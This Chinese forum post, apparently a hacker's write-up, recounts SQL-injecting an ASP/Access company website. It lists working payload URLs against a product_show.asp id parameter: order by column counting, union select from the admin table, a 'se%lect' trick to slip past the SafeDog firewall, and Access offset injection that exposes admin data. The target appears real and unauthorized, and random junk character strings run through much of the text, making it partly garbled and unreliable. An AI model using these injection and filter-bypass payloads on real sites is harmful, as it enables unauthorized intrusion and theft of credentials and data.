打开网站,一个企业站。
- y0 M0 x4 p, I- c5 Z
/ B3 e& \6 h$ n8 P7 S
& I) o* E: z4 m顺手加个admin5 m# ^0 J: C5 @" t7 H" w0 ]
: U, B0 X1 v0 C! k
) Y9 k A% R; L0 ?* G1 }! Y
默认后台。
9 n+ L4 S1 p% l# j# q回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。: L& }2 ]4 K$ G# }+ C
8 ?4 d* d: P& M1 a: }
2 ?9 @9 f* Z) }1 ^) T! `& h0 J
B# [# H# ^7 ~2 j) }' C6 S. z+ Y
所以就不用御剑扫了,待会直接封IP。
+ U) ?2 w) u( e
9 S/ b8 j7 l. ~- i# X5 _用order by语句判断是否存在注入。3 a/ K6 V3 b! ]( L+ Q0 A
http://www.xxx.com /product_show.asp?id=997 order by 18 [0 H7 h9 K5 t) g+ }
http://www.xxx.com /product_show.asp?id=997 order by 1001 x7 |- K$ h- \ E
现在存在注入,经测试后发现是9个字段。! h, |% C5 Z- X
7 g% L( N* n$ k0 P. R) x接下来进行联合查询,猜是否存在admin表。# {* G) [1 V9 L" B# d0 Q2 M, a
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
% N- J& g, F1 g2 x' I! U, O; P
. d, @; N& Y5 g8 h& V, u, f) ?+ l! ^# @$ e+ N! x
1 I: Z5 z& a! T. H8 e在select中间加个%,se%lect绕过安全狗。
# D' z9 C+ D. D: [- `" Y: N
6 R/ N' |, u C6 ?! O1 z _2 O0 Q) `8 E- U, ]4 B
发现存在admin表,然后开始手工猜常用的字段。
+ ]3 _2 |* q8 V+ u& m纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
6 w5 `$ f8 }/ D
% ~4 ^8 b+ u3 n/ c/ s+ V突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。! J- E3 O- o" O, | u
/ ]6 n$ J8 t3 b3 o. R
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
) R* b0 Y% a1 ?- S+ v* ^http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin( }- J4 G1 X4 k1 V' k; S
好了,敏感内容出显了。: s6 ^2 E: z, R9 X7 }
- R/ _+ t8 I3 b9 f! m# }" [' V3 _+ d
; M' X5 h, D& [3 k# p/ L
4 J% i: o# |% ]+ m* }- R1 A |